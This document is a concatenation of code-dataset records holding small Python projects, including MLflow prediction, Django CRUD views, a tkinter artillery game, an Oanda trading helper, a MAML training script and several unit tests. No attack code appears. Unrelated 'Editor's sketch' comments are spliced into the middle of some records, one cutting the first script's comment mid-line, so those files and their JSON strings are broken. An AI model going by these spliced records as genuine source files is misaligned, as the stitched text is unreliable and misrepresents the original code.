+{"seq_id":"239791929","text":"from pyspark.sql import SparkSession, functions as F\n# Load 
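# Editor's sketch (independent of the records above) of the np.roll trick the
# ReplayBuffer.push method uses when a write would run past max_steps: rolling
# the array right by the remaining slot count shifts the oldest samples toward
# the end, so the write index can safely wrap around and restart at 0.
import numpy as np

buf = np.arange(6)            # toy buffer with max_steps = 6
curr_i, nentries = 4, 3       # writing 3 more entries would overflow
rollover = len(buf) - curr_i  # 2 slots remain before the end
buf = np.roll(buf, rollover)  # buf is now [4, 5, 0, 1, 2, 3]
curr_i = 0                    # new data overwrites the (rolled) oldest entries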
saved model with MLflow\nimport mlflow.spark\nimport os\n\nos.environ['MLFLOW_TRACKING_URI'] = 'http://localhost:5000/'\nos.environ['PYSPARK_PYTHON'] = 'python3'\nos.environ['PYSPARK_DRIVER_PYTHON'] = 'python3'\n# Generate predictions\nspark = (SparkSession.builder\n .appName(\"Spark Advertising Train Model\")\n .master(\"yarn\")\n .getOrCreate())\n\ninputDF = (spark\n .read\n .format(\"csv\")\n .option(\"inferSchema\",True)\n .option(\"header\", True)\n .option(\"sep\",\",\")\n .load(\"hdfs://localhost:9000/user/train/datasets/Advertising.csv\"))\n\n\nimport mlflow.pyfunc\n\ndata = inputDF.select(\"TV\",\"Radio\",\"Newspaper\").limit(5).toPandas()\n# You can leanr model name from http://localhost:5000/#/models\nmodel_name = \"spark-random-forest-reg-model\"\nmodel_version = 3\n\nmodel = mlflow.pyfunc.load_model(\n model_uri=f\"models:/{model_name}/{model_version}\"\n)\n# data should be pandas dataframe\nprint(model.predict(data=data))\n# Expected output\n# [21.554416629994716, 11.217042979152959, 12.242694120291947, 18.38443154761905, 13.517194939980039]\n","sub_path":"mlflow/play/spark_advertsing_regression/batch_prediction.py","file_name":"batch_prediction.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"325238432","text":"class Solution:\n def maxSubArray(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n # input:[-2,1,-3,4,-1,2,1,-5,4]\n # output:6\n # [4,-1,2,1]\n res = nums[0]\n total = 0\n for i, c in enumerate(nums):\n if total > 0:\n total += c\n else:\n total = c\n res = max(res, total)\n\n return res","sub_path":"53_maxSubArray.py","file_name":"53_maxSubArray.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"164478095","text":"\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Jun 20 13:24:00 2019\r\n\r\n@author: vaibhav\r\n\"\"\"\r\nimport cv2\r\n\r\nx = cv2.imread(\"rect.jpg\",0)\r\nr,y=cv2.threshold(x,100,255,cv2.THRESH_BINARY_INV)\r\nc,a= cv2.findContours(y,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)\r\n\r\n\r\ncv2.rectangle(x,tuple(c[0][0][0]),tuple(c[0][2][0]),(160,56,80),5)\r\n\r\n#cv2.imshow(\"rect\",u)\r\ncv2.imshow(\"original\",x)\r\ncv2.imshow(\"thres\",y)\r\n\r\ncv2.waitKey()\r\ncv2.destroyAllWindows()\r\n","sub_path":"rect_detection.py","file_name":"rect_detection.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"265255360","text":"from .models import *\nfrom .forms import *\nfrom django.shortcuts import render, redirect\nfrom django.core.mail import send_mail, BadHeaderError\nfrom django.http import HttpResponse\n\ndef home(request):\n books = Book.objects.all()\n\n form = BookForm()\n if request.method =='POST':\n form = BookForm(request.POST)\n if form.is_valid():\n form.save()\n return redirect('/')\n\n context = {\"books\":books, 'form':form}\n return render(request, \"homepage.html\", context)\n\ndef updateBook(request, pk):\n book = Book.objects.get(id=pk)\n\n form = BookForm(instance=book)\n\n if request.method == 'POST':\n form = BookForm(request.POST, instance=book)\n if form.is_valid():\n form.save()\n return redirect('/')\n\n context = {'form':form}\n\n return render(request, 'update_book.html', context)\n\ndef deleteBook(request, pk):\n book = Book.objects.get(id=pk)\n context = {'book':book}\n\n if request.method == 'POST':\n 
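# Editor's side note with a hedged sketch (not the app's own code): the
# Model.objects.get(id=pk) calls in these views raise DoesNotExist (an HTTP
# 500) for an unknown pk; Django's get_object_or_404 shortcut converts that
# into a 404 response instead. `Book` refers to the model imported above.
from django.shortcuts import get_object_or_404, render

def preview_book_safe(request, pk):
    book = get_object_or_404(Book, id=pk)  # 404 instead of DoesNotExist
    return render(request, 'preview_book.html', {'bookp': book})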
book.delete()\n return redirect('/')\n\n return render(request, 'delete_book.html', context)\n\ndef previewBook(request, pk):\n book = Book.objects.get(id=pk)\n context = {'bookp':book}\n\n return render(request, 'preview_book.html', context)\n\ndef contactView(request):\n if request.method == 'GET':\n formC = ContactForm()\n else:\n formC = ContactForm(request.POST)\n if formC.is_valid():\n subject = formC.cleaned_data['subject']\n from_email = formC.cleaned_data['from_email']\n message = formC.cleaned_data['message']\n try:\n send_mail(subject, message, from_email, ['admin@example.123'])\n except BadHeaderError:\n return HttpResponse('Invalid header found.')\n return redirect('home')\n return render(request, \"email.html\", {'formC': formC})\n","sub_path":"myapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"179485009","text":"from random import choice, randint as rnd\n\nfrom tkinter import Tk, Canvas, BOTH, mainloop, CENTER, Frame\n\nroot = Tk()\nfr = Frame(root)\nroot.geometry('730x600')\ncanvas = Canvas(root, bg='white')\ncanvas.pack(fill=BOTH, expand=1)\nspeed = 1\ndT = 10\n\n\nclass Ball:\n def __init__(self):\n self.x = 0\n self.y = 0\n self.elastic = 0\n self.g = 0\n self.live = 0\n self.r = 0\n self.vx = 0\n self.vy = 0\n self.color = choice(['blue', 'green', 'red', 'brown'])\n self.id = canvas.create_oval(\n self.x - self.r,\n self.y - self.r,\n self.x + self.r,\n self.y + self.r,\n fill=self.color)\n\n def appear(self, x, y, vx, vy):\n self.x = x\n self.y = y\n self.elastic = 0.6\n self.g = 0.1\n self.live = 1000\n self.r = 10\n self.vx = vx\n self.vy = vy\n self.color = choice(['blue', 'green', 'red', 'brown'])\n self.id = canvas.create_oval(\n self.x - self.r,\n self.y - self.r,\n self.x + self.r,\n self.y + self.r,\n fill=self.color)\n\n def move(self, fild):\n canvas.delete(self.id)\n\n self.vy -= self.g\n min_range_1 = self.r\n min_range_2 = self.r\n min_index_1 = -1\n min_index_2 = -1\n\n for point in fild:\n x = point[0]\n y = point[1]\n dx = x - self.x\n dy = y - self.y\n\n if dx ** 2 + dy ** 2 < min_range_1 ** 2:\n min_range_2 = min_range_1\n min_range_1 = (dx ** 2 + dy ** 2) ** 0.5\n min_index_2 = min_index_1\n min_index_1 = fild.index(point)\n elif dx ** 2 + dy ** 2 < min_range_2 ** 2:\n min_range_2 = (dx ** 2 + dy ** 2) ** 0.5\n min_index_2 = fild.index(point)\n\n if min_index_1 != -1 and min_index_2 != -1:\n min_numb = min(min_index_1, min_index_2)\n max_numb = max(min_index_1, min_index_2)\n y1 = fild[min_numb][1]\n y2 = fild[max_numb][1]\n x1 = fild[min_numb][0]\n x2 = fild[max_numb][0]\n\n if x2 - x1 == 0:\n cos_a = 0\n else:\n cos_a = (x2 - x1) / ((x2 - x1) ** 2 + (y2 - y1) ** 2) ** 0.5\n\n if y2 - y1 == 0:\n sin_a = 0\n else:\n sin_a = -(y2 - y1) / ((x2 - x1) ** 2 + (y2 - y1) ** 2) ** 0.5\n\n self.vy += self.g\n self.y += self.vy\n self.x -= self.vx\n self.vy *= self.elastic\n self.vx *= self.elastic\n instant_vx = self.vx\n self.vx = self.vx * cos_a + self.vy * sin_a\n self.vy = -instant_vx * sin_a + self.vy * cos_a\n self.vy *= -1\n self.vx = self.vx * cos_a - self.vy * sin_a\n self.vy = instant_vx * sin_a + self.vy * cos_a\n\n self.y -= self.vy\n self.x += self.vx\n\n if self.live <= 0:\n canvas.delete(self.id)\n else:\n self.live -= 1\n\n self.id = canvas.create_oval(\n self.x - self.r,\n self.y - self.r,\n self.x + self.r,\n self.y + self.r,\n fill=self.color)\n\n\nclass Gun:\n def __init__(self, numb):\n self.energy = 3\n 
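# Editor's stand-alone sketch of the bounce that Ball.move implements with its
# rotate/flip/rotate-back steps: reflecting a velocity about a surface with
# unit normal n is the classic v' = v - 2 (v . n) n, optionally damped by an
# elasticity factor. Pure math, no dependence on the game code above.
def reflect(vx, vy, nx, ny, elasticity=1.0):
    dot = vx * nx + vy * ny   # component of v along the normal
    rx = vx - 2.0 * dot * nx  # subtract it twice to mirror v
    ry = vy - 2.0 * dot * ny
    return elasticity * rx, elasticity * ry

# Falling straight down onto a flat floor (normal pointing up):
assert reflect(0.0, -3.0, 0.0, 1.0) == (0.0, 3.0)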
self.vx = 0\n self.vy = 0\n self.numb = numb\n self.live = 3\n self.r = 15\n self.x = rnd(20, 220) + 500 * numb # work only for 2 players\n self.y = 0\n self.len_x = 20\n self.len_y = 20\n self.colors = ['blue', 'green', 'red', 'brown']\n self.body_id = canvas.create_oval(\n self.x - self.r,\n self.y - self.r,\n self.x + self.r,\n self.y + self.r,\n fill=self.colors[self.numb])\n\n self.gun_id = canvas.create_line(\n self.x,\n self.y,\n self.x + self.len_x,\n self.y - self.len_y,\n fill='black',\n width=7)\n\n def move(self, fild, power, cos_a, sin_a):\n touch = 0\n self.x += self.vx\n self.y += self.vy\n\n for point in fild:\n dx = self.x - point[0]\n dy = self.y - point[1]\n\n if dx ** 2 + dy ** 2 < self.r ** 2:\n touch = 1\n\n if touch == 0:\n self.vy += 0.1\n else:\n self.vy = 0\n self.vx = 0\n\n self.drowing(power, cos_a, sin_a)\n\n def move_left(self, event):\n if self.energy > 0:\n self.vx -= 2\n self.vy -= 2\n self.energy -= 1\n\n def move_right(self, event):\n if self.energy > 0:\n self.vx += 2\n self.vy -= 2\n self.energy -= 1\n\n def move_up(self, event):\n if self.energy > 0:\n self.vy -= 2\n self.energy -= 1\n\n def move_down(self, event):\n if self.energy > 0:\n self.vy += 2\n self.energy -= 1\n\n def drowing(self, power, cos_a, sin_a):\n canvas.delete(self.body_id)\n canvas.delete(self.gun_id)\n self.len_x = max(power, 3) * 10 * cos_a\n self.len_y = -max(power, 3) * 10 * sin_a\n\n self.body_id = canvas.create_oval(\n self.x - self.r,\n self.y - self.r,\n self.x + self.r,\n self.y + self.r,\n fill=self.colors[self.numb])\n\n if power != 0:\n self.gun_id = canvas.create_line(\n self.x,\n self.y,\n self.x + self.len_x,\n self.y - self.len_y,\n fill='orange',\n width=7)\n else:\n self.gun_id = canvas.create_line(\n self.x,\n self.y,\n self.x + self.len_x,\n self.y - self.len_y,\n fill='black',\n width=7)\n\n\nclass Game():\n def __init__(self):\n self.start_text = ''\n self.fild = [[10, 600]]\n self.is_fild = 0\n self.is_create = 0\n self.game_over = 0\n self.cos_a = 0\n self.sin_a = 0\n self.gun = []\n self.gun_numb = 2\n self.live_text = []\n self.turn = 1\n self.preparation = 0\n\n for numb in range(self.gun_numb):\n self.gun.append(Gun(numb))\n self.live_text.append('')\n\n self.angle = 0\n self.power = 0\n self.balls = []\n\n def hittest(self):\n for ball in self.balls:\n for numb in range(self.gun_numb):\n dx = ball.x - self.gun[numb].x\n dy = ball.y - self.gun[numb].y\n r = ball.r + self.gun[numb].r\n\n if dx ** 2 + dy ** 2 < r ** 2 and ball.live < 977:\n self.gun[numb].live -= 1\n canvas.delete(self.live_text[numb])\n self.live_text[numb] = canvas.create_text(\n 10 * (numb + 1),\n 10,\n text=self.gun[numb].live,\n justify=CENTER,\n font=\"Verdana 10\",\n fill=self.gun[numb].colors[numb])\n\n if self.gun[numb].live != 0:\n canvas.delete(ball.id)\n self.balls.pop(self.balls.index(ball))\n else:\n canvas.delete(self.gun[numb].gun_id)\n canvas.delete(self.gun[numb].body_id)\n\n if self.gun[numb].y > 600:\n self.gun[numb].live = 0\n\n def new_ball(self, event):\n self.balls.append(Ball())\n this_ball = self.balls[len(self.balls) - 1]\n vx = self.power * self.cos_a\n vy = self.power * self.sin_a\n a = self.gun_numb\n this_ball.appear(self.gun[self.turn % a].x, self.gun[self.turn % a].y, vx, -vy)\n self.power = 0\n self.preparation = 0\n self.gun[self.turn % a].energy = 3\n self.turn += 1\n\n def shot_prepair(self, event):\n self.preparation = 1\n\n def targetting(self, event):\n a = self.gun_numb\n dx = event.x - self.gun[self.turn % a].x\n dy = event.y - self.gun[self.turn % 
a].y\n\n if dx == 0:\n self.cos_a = 0\n else:\n self.cos_a = dx / (dx ** 2 + dy ** 2) ** 0.5\n\n if dy == 0:\n self.sin_a = 0\n else:\n self.sin_a = dy / (dx ** 2 + dy ** 2) ** 0.5\n\n def ball_to_old(self):\n numb = 0\n\n while numb < len(self.balls):\n self.balls[numb].move(self.fild)\n\n if self.balls[numb].live <= 0:\n canvas.delete(self.balls[numb].id)\n self.balls.pop(numb)\n\n numb += 1\n\n def power_up(self):\n if self.power < 15 and self.preparation == 1:\n self.power += 0.1\n\n def create_fild(self, event):\n if event.x < 10:\n self.is_fild = 1\n\n if event.x > 720:\n self.is_fild = -1\n self.fild.append([720, 600])\n canvas.create_polygon(self.fild)\n\n if self.is_fild == 1:\n self.fild.append([event.x, event.y])\n\n def main(self):\n canvas.delete(self.start_text)\n\n if self.is_fild != -1:\n self.start_text = canvas.create_text(\n 365,\n 300,\n text=\"для начала битвы, проведите слева направо мышкой\",\n justify=CENTER,\n font=\"Verdana 14\")\n\n canvas.bind('', self.create_fild)\n else:\n canvas.bind('', self.targetting)\n\n for numb in range(self.gun_numb):\n self.gun[numb].move(self.fild, self.power, self.cos_a, self.sin_a)\n\n canvas.bind('', self.shot_prepair)\n self.power_up()\n canvas.bind('', self.new_ball)\n canvas.bind('', self.gun[self.turn % self.gun_numb].move_up)\n canvas.bind('', self.gun[self.turn % self.gun_numb].move_down)\n canvas.bind('', self.gun[self.turn % self.gun_numb].move_left)\n canvas.bind('', self.gun[self.turn % self.gun_numb].move_right)\n self.ball_to_old()\n self.gun[self.turn % self.gun_numb].drowing(self.power, self.cos_a, self.sin_a)\n self.hittest()\n\n self.game_over = 0\n\n for numb in range(self.gun_numb):\n if self.gun[numb].live == 0:\n self.game_over = 1\n lost_numb = numb\n\n if self.game_over == 0:\n root.after(dT, self.main)\n else:\n canvas.create_text(\n 365,\n 300,\n text=str(lost_numb + 1)+\" player lost\",\n justify=CENTER,\n font=\"Verdana 30\",\n fill=self.gun[lost_numb].colors[lost_numb])\n\n\ngame = Game()\ngame.main()\nmainloop()\n","sub_path":"bettergun.py","file_name":"bettergun.py","file_ext":"py","file_size_in_byte":11255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"390087611","text":"import requests\nimport json\nfrom currency.utils import Currency\nfrom currency.oanda.utils import Config, h\n\n\nclass Trade:\n def __init__(self, config: Config, currency: Currency, i: int, units: int = None, take: float = None, stop: float = None):\n self.id = i\n self.config = config\n self.currency = currency\n self.headers = h(config.beaver)\n self.units = units\n self.take = take\n self.stop = stop\n\n def __repr__(self):\n return f\"{self.id}|{self.currency}|{self.units}|{self.take}|{self.stop}\"\n\n @classmethod\n def create(cls, config: Config, currency: Currency, units: int, take: float, stop: float):\n url = f\"https://api-fxpractice.oanda.com/v3/accounts/{config.account}/orders\"\n data = {\n \"order\": {\n \"units\": units,\n \"instrument\": currency.oanda,\n \"type\": \"MARKET\",\n \"takeProfitOnFill\": {\n \"price\": str(round(take, 5))\n },\n \"stopLossOnFill\": {\n \"price\": str(round(stop, 5))\n }\n }\n }\n req = requests.post(url, headers=h(config.beaver), data=json.dumps(data)).json()\n return cls(config=config, currency=currency, i=req[\"orderFillTransaction\"][\"id\"], units=units, take=take, stop=stop)\n\n def close(self):\n url = f\"https://api-fxpractice.oanda.com/v3/accounts/{self.config.account}/trades/{self.id}/close\"\n req = 
requests.put(url=url, headers=self.headers)\n return req.json()\n\n#\n# if __name__ == '__main__':\n# c = Config.init_from_file()\n# # Trade.create(c, Currency(\"eur\"), 100000, 1.25, 1.09)\n# t = Trade(c, Currency(first=\"eur\", period=Daily(1)), 183)\n# pprint(t.close())\n","sub_path":"currency/oanda/trade.py","file_name":"trade.py","file_ext":"py","file_size_in_byte":1780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"151379321","text":"from time import time_ns\n\nfrom pyprocessing.utils import SingletonMeta\n\n\nclass RenderersDelegate:\n def __init__(self, renderers, render_attr):\n self.renderers = renderers\n self.render_attr = render_attr\n methods = (\n m\n for r in self.renderers\n for m in dir(getattr(r, render_attr))\n if not m.startswith('__')\n )\n for method in methods:\n if not hasattr(self, method):\n setattr(\n self, method,\n lambda *a, m=method, **kw: self.__delegate(\n m, *a, **kw\n )\n )\n\n def __delegate(self, mname, *args, **kwargs):\n print(mname, args, kwargs)\n for r in self.renderers:\n getattr(getattr(r, self.render_attr), mname)(*args, **kwargs)\n\n\nclass PyProcessing(metaclass=SingletonMeta):\n def __init__(self):\n self.width = 640\n self.height = 480\n self.start_time_ns = 0\n self.namespace = {}\n self.renderers = []\n\n def attach_renderer(self, renderer_class):\n renderer = renderer_class(self)\n renderer.init()\n self.renderers.append(renderer)\n\n def start(self):\n for renderer in self.renderers:\n renderer.start()\n self.start_time_ns = time_ns()\n\n @property\n def windows(self):\n return RenderersDelegate(self.renderers, 'window')\n","sub_path":"pyprocessing/pyprocessing.py","file_name":"pyprocessing.py","file_ext":"py","file_size_in_byte":1441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"158993283","text":"from maml_zoo.envs.point_envs.point_env_2d import MetaPointEnv\nfrom maml_zoo.envs.mujoco_envs.half_cheetah_rand_direc import HalfCheetahRandDirecEnv\nfrom maml_zoo.envs.normalized_env import normalize\nfrom maml_zoo.meta_algos.trpo_dice_maml import TRPO_DICEMAML\nfrom maml_zoo.meta_trainer import Trainer\nfrom maml_zoo.samplers import MAMLSampler\nfrom maml_zoo.samplers import DiceMAMLSampleProcessor\nfrom maml_zoo.policies.meta_gaussian_mlp_policy import MetaGaussianMLPPolicy\nimport os\nfrom maml_zoo.logger import logger\nimport json\nimport numpy as np\n\n\nmaml_zoo_path = '/'.join(os.path.realpath(os.path.dirname(__file__)).split('/')[:-1])\n\n\ndef main(config):\n reward_baseline = LinearTimeBaseline()\n return_baseline = LinearFeatureBaseline()\n env = normalize(HalfCheetahRandDirecEnv())\n\n policy = MetaGaussianMLPPolicy(\n name=\"meta-policy\",\n obs_dim=np.prod(env.observation_space.shape),\n action_dim=np.prod(env.action_space.shape),\n meta_batch_size=config['meta_batch_size'],\n hidden_sizes=config['hidden_sizes'],\n )\n\n sampler = MAMLSampler(\n env=env,\n policy=policy,\n rollouts_per_meta_task=config['rollouts_per_meta_task'], # This batch_size is confusing\n meta_batch_size=config['meta_batch_size'],\n max_path_length=config['max_path_length'],\n parallel=config['parallel'],\n )\n\n sample_processor = DiceMAMLSampleProcessor(\n baseline=reward_baseline,\n max_path_length=config['max_path_length'],\n discount=config['discount'],\n normalize_adv=config['normalize_adv'],\n positive_adv=config['positive_adv'],\n return_baseline=return_baseline\n\n )\n\n algo = TRPO_DICEMAML(\n policy=policy,\n 
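# Editor's minimal sketch (hypothetical classes) of the fan-out delegation
# idea behind RenderersDelegate in the pyprocessing record above: attribute
# lookups on the proxy return a callable that forwards one call to the same
# method on every registered backend and collects the results.
class FanOut:
    def __init__(self, targets):
        self._targets = targets

    def __getattr__(self, name):
        def call(*args, **kwargs):
            return [getattr(t, name)(*args, **kwargs) for t in self._targets]
        return call

class EchoBackend:
    def draw(self, shape):
        return 'drew ' + shape

assert FanOut([EchoBackend(), EchoBackend()]).draw('circle') == ['drew circle', 'drew circle']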
max_path_length=config['max_path_length'],\n meta_batch_size=config['meta_batch_size'],\n num_inner_grad_steps=config['num_inner_grad_steps'],\n inner_lr=config['inner_lr'],\n step_size=config['step_size']\n )\n\n trainer = Trainer(\n algo=algo,\n policy=policy,\n env=env,\n sampler=sampler,\n sample_processor=sample_processor,\n n_itr=config['n_itr'],\n num_inner_grad_steps=config['num_inner_grad_steps'], # This is repeated in MAMLPPO, it's confusing\n )\n trainer.train()\n\n\nif __name__==\"__main__\":\n idx = np.random.randint(0, 1000)\n logger.configure(dir=maml_zoo_path + '/data/vpg/test_%d' % idx, format_strs=['stdout', 'log', 'csv'],\n snapshot_mode='last_gap')\n config = json.load(open(maml_zoo_path + \"/configs/trpo_dice_maml_config.json\", 'r'))\n json.dump(config, open(maml_zoo_path + '/data/vpg/test_%d/params.json' % idx, 'w'))\n main(config)\n","sub_path":"run_scripts/trpo_dice_run.py","file_name":"trpo_dice_run.py","file_ext":"py","file_size_in_byte":2734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"389462929","text":"# Copyright 2022 Huawei Technologies Co., Ltd\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ============================================================================\nimport numpy as np\nimport pytest\nimport mindspore as ms\nimport mindspore.nn as nn\nfrom mindspore import Tensor\nfrom mindspore import ops\n\n\nclass Net(nn.Cell):\n def construct(self, x):\n return ops.slogdet(x)\n\n\n@pytest.mark.level1\n@pytest.mark.platform_x86_cpu\n@pytest.mark.platform_arm_cpu\n@pytest.mark.platform_x86_gpu_training\n@pytest.mark.platform_arm_ascend_training\n@pytest.mark.platform_x86_ascend_training\n@pytest.mark.env_onecard\n@pytest.mark.parametrize('mode', [ms.GRAPH_MODE, ms.PYNATIVE_MODE])\ndef test_slogdet(mode):\n \"\"\"\n Feature: slogdet\n Description: Verify the result of slogdet\n Expectation: success\n \"\"\"\n ms.set_context(mode=mode)\n x = Tensor([[-1.8297, -0.8474, 1.0292], [-1.2167, 0.5574, -0.6753], [-0.6702, 0.2276, 1.2421]])\n net = Net()\n output1, output2 = net(x)\n expect_output1 = np.array(-1, dtype=np.float32)\n expect_output2 = np.array(1.13549, dtype=np.float32)\n assert np.allclose(output1.asnumpy(), expect_output1)\n assert np.allclose(output2.asnumpy(), expect_output2)\n\n\n@pytest.mark.level1\n@pytest.mark.platform_x86_cpu\n@pytest.mark.platform_arm_cpu\n@pytest.mark.platform_x86_gpu_training\n@pytest.mark.env_onecard\n@pytest.mark.parametrize('mode', [ms.GRAPH_MODE, ms.PYNATIVE_MODE])\ndef test_slogdet_complex(mode):\n \"\"\"\n Feature: slogdet\n Description: Verify the result of slogdet\n Expectation: success\n \"\"\"\n ms.set_context(mode=mode)\n x = Tensor([[-1.5 + 7.8j, 3 + 5.75j, 2 + 2.4j],\n [-6.4 + 485.4j, 45 + 3.14j, 45 + 453j],\n [-3.5 + 5.8j, 63 + 12.75j, -5 + 6.4j]], dtype=ms.complex64)\n net = Net()\n output1, output2 = net(x)\n expect_output1 = np.array(0.749919+0.66153j, dtype=np.complex)\n expect_output2 = np.array(12.0614+0j, dtype=np.complex)\n assert 
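# Editor's cross-check sketch in plain NumPy (independent of MindSpore):
# slogdet returns (sign, log|det|), and the determinant itself is recovered
# as sign * exp(logabsdet), which is numerically safer for large matrices
# whose determinant would overflow or underflow a float.
import numpy as np

x = np.array([[-1.8297, -0.8474, 1.0292],
              [-1.2167, 0.5574, -0.6753],
              [-0.6702, 0.2276, 1.2421]])
sign, logabsdet = np.linalg.slogdet(x)
assert np.isclose(sign * np.exp(logabsdet), np.linalg.det(x))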
np.allclose(output1.asnumpy(), expect_output1)\n assert np.allclose(output2.asnumpy(), expect_output2)\n","sub_path":"tests/st/ops/test_func_slogdet.py","file_name":"test_func_slogdet.py","file_ext":"py","file_size_in_byte":2572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"172868726","text":"from machine import Pin\nimport time\nimport display\nfrom display import oled\n\ntipka=Pin(12, Pin.IN)\ndisplay.init()\noled.fill(1)\noled.show()\ntime.sleep(1)\noled.fill(0)\noled.show()\ni=0\n\nwhile tipka.value():\n if i==60:\n i=0\n oled.fill(0)\n var = input()\n oled.text(var,0,i)\n oled.show()\n i=i+10\n","sub_path":"display.py","file_name":"display.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"86471344","text":"from app.network import get_napalm_connection\nfrom app.notifications import notify_slack\n\n\ndef ztp_start(host, file):\n msg = '{} downloaded {}'.format(host, file)\n notify_slack(msg)\n dev = get_napalm_connection(host, 'ios')\n\n if dev:\n notify_slack('{} connection established'.format(host))\n else:\n notify_slack('{} connection failed, giving up'.format(host))\n return\n\n facts = dev.get_facts()\n\n notify_slack('{}: {}/{}'.format(host, facts['model'],\n facts['serial_number']))\n\n lldp = dev.get_lldp_neighbors()\n for interface in lldp:\n for neighbor in lldp[interface]:\n notify_slack('{}:{} -> {}: {}'.format(\n host, interface, neighbor['hostname'],\n neighbor['port']))\n\n dev.close()\n","sub_path":"tutorial/inventory/app/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"246820972","text":"from ...lib import *\n\nimport itertools\nimport os\n\n__MYDIR__ = os.path.abspath(os.path.dirname(__file__))\n__MYPARMS__ = list(\n itertools.product(\n [175, 176, 177],\n [143, 144, 145],\n [\"I420\", \"NV12\", \"YV12\", \"P010\", \"AYUV\", \"YUY2\", \"ARGB\", \"422H\", \"444P\",\n \"P210\", \"P410\"],\n )\n)\n\ndef gen_multiframe_from(infile, count):\n outfile = get_media()._test_artifact(os.path.basename(infile))\n with open(infile, \"rb\") as fd:\n data = fd.read()\n with open(outfile, \"wb\") as fd:\n for i in xrange(count):\n fd.write(data)\n return outfile\n\n@slash.parametrize((\"width\", \"height\", \"fmt\"), __MYPARMS__)\ndef test_get_framesize(width, height, fmt):\n asset = os.path.join(__MYDIR__, \"assets\", \"{}x{}.{}\").format(width, height, fmt)\n assert get_framesize(width, height, fmt) == os.stat(asset).st_size\n\n@slash.parametrize((\"width\", \"height\", \"fmt\"), __MYPARMS__)\ndef test_check_filesize(width, height, fmt):\n asset = os.path.join(__MYDIR__, \"assets\", \"{}x{}.{}\").format(width, height, fmt)\n\n # single frame\n frames = 1\n check_filesize(asset, width, height, frames, fmt)\n\n # multi-frame\n frames = 31\n check_filesize(\n gen_multiframe_from(asset, frames), width, height, frames, fmt)\n\n@slash.parametrize((\"width\", \"height\", \"fmt\"), __MYPARMS__)\ndef test_frame_reader(width, height, fmt):\n asset = os.path.join(__MYDIR__, \"assets\", \"{}x{}.{}\").format(width, height, fmt)\n frames = 27\n with open(gen_multiframe_from(asset, frames), \"rb\") as fd:\n size = get_framesize(width, height, fmt)\n for n in xrange(1, frames):\n y, u, v = FrameReaders[fmt](fd, width, height)\n assert fd.tell() == size * 
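# Editor's hedged sketch of the per-frame byte arithmetic a get_framesize
# helper typically performs (standard format definitions, not taken from the
# library under test, and assuming even width/height so the 4:2:0 chroma
# planes divide cleanly): 8-bit 4:2:0 (I420/YV12/NV12) is 1.5 bytes per
# pixel, packed 4:2:2 (YUY2) is 2, P010 doubles 4:2:0 to 16-bit samples (3),
# and AYUV/ARGB pack 4 bytes per pixel.
def framesize(width, height, fmt):
    bytes_per_pixel = {
        'I420': 1.5, 'YV12': 1.5, 'NV12': 1.5,
        'YUY2': 2, 'P010': 3, 'AYUV': 4, 'ARGB': 4,
    }[fmt]
    return int(width * height * bytes_per_pixel)

assert framesize(176, 144, 'I420') == 176 * 144 * 3 // 2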
n\n","sub_path":"test/self/formats.py","file_name":"formats.py","file_ext":"py","file_size_in_byte":1627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"172242938","text":"from rest_framework.status import HTTP_200_OK\n\nfrom common.tests import BaseAPITestCase\n\nfrom ..factories import ClassTimeFactory\nfrom ..models import Class, ClassTime\n\n\nclass RestAPIClassTimes(BaseAPITestCase):\n\n def setUp(self):\n super(RestAPIClassTimes, self).setUp()\n self.class_time = ClassTimeFactory()\n\n def test_get_class_times(self):\n url = self.reverse('class-times-detail', kwargs={'pk': self.class_time.id})\n response = self.client.get(url)\n\n self.assertEqual(response.status_code, HTTP_200_OK)\n\n def test_sync(self):\n Class.objects.filter(id=self.class_delphi.id).update(class_time=self.class_time)\n class_time = ClassTime.objects.get(id=self.class_time.id)\n class_time.number = 2\n class_time.save()\n\n url = self.reverse('class-times-sync')\n updated_ids = [class_time.id]\n deleted_ids = []\n\n self.init_sync(url, updated_ids, deleted_ids)\n\n def test_meta(self):\n class_times = ClassTime.objects.filter(class__timetable__subgroup__subscription__in=[self.subscription])\n url = self.reverse('class-times-meta')\n\n self.init_meta(url, class_times)\n","sub_path":"university/tests/test_class_times.py","file_name":"test_class_times.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"165233726","text":"def ganadorDeCampeonatoDeFutbol(encuentrosDeportivos):\n\n ganadorDelCampeonato = \"\"\n\n puntajeEquipos = {}\n\n if (len(encuentrosDeportivos) == 0):\n\n return 